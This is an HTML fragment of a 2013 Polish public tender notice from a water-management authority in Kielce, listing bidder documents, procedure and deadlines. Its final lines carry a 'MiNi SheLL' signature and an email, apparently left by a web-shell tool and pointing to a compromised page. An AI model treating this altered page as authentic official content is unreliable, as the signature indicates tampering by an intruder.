<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Inne dokumenty wymagane w postępowaniu przez Zamawiającego: 

1.1.	 Wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1 do SIWZ     Wymagana forma dokumentu - oryginał.

1.2.	Pełnomocnictwo - jeżeli upoważnienie do podpisania oferty nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy - nie dotyczy pełnomocnictwa w za-kresie oferty Wykonawców wspólnie ubiegających się o zamówienie. Wymagana forma dokumentu oryginał lub kserokopia poświadczona notarialnie. 

1.3.	Pełnomocnictwo w przypadku oferty Wykonawców występujących wspólnie o udzie-lenie zamówienia, o którym mowa w rozdz. IX. Forma dokumentu oryginał lub kopia po-świadczona notarialnie.

1.4.	Na podstawie art. 25 ust. 1 ustawy w przypadku prowadzenia działalności w formie spółki cywilnej gdy jest więcej niż jeden przedsiębiorca (wspólnik) należy do oferty załączyć kserokopię umowy spółki poświadczoną za zgodność z oryginałem przez wszystkich wspólników lub pełnomocnika (wspólnika) umocowanego do takiej czynności. 
Warunek nie ma zastosowania w odniesieniu do spółek jawnych w przypadku załączenia do oferty aktualnego odpisu z właściwego rejestru - Krajowego Rejestru Sądowego, jeżeli ujawniono w nim wspólników spółki, oraz sposób reprezentowania spółki (składania oświadczeń woli). 

1.5.	W przypadku wykonywania dyspozycji pkt. 6 rozdz. VII SIWZ, czyli w sytuacji kiedy Wykonawca wykazując spełnianie warunków, udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Wykonawca w celu udowodnienia Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, załącza do oferty:


1.5.1.	pisemne zobowiązanie  podmiotów  do oddania Wykonawcy przez dany pod-miot(y) do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wy-konywaniu zamówienia. Wymagana forma dokumentu - oryginał

1.5.2.	dokumenty, o których mowa w par. 1 ust. 6 pkt 2  Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013 poz. 231) 

-	Jeżeli zobowiązanie, o którym mowa w pkt. 1.5.1 w swojej treści wyczerpuje wszelkie przesłanki, o których mowa w par. 1, ust. 6, pkt 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wy-konawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013 poz. 231) Wykonawca nie jest zobowiązany do przedkładania dokumentów, o którym mowa 
w pkt. 1.5.2. 

1.6	Stosownie do art. 26 ust. 2d ustawy, listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej - wg wzoru określonego w załączniku nr 7 do SIWZ. Wymagana forma dokumentu - oryginał. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten składa każdy z Wykonawców osobno.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia, które zostaną wprowadzone do treści umowy.


1.1.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy:

-	w przypadku zmniejszenia zakresu robót i wynagrodzenia Wykonawcy robót budowlanych

2.	Wzór umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szmiuw.kielce.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2013 godzina 10:00, miejsce: Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 217 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com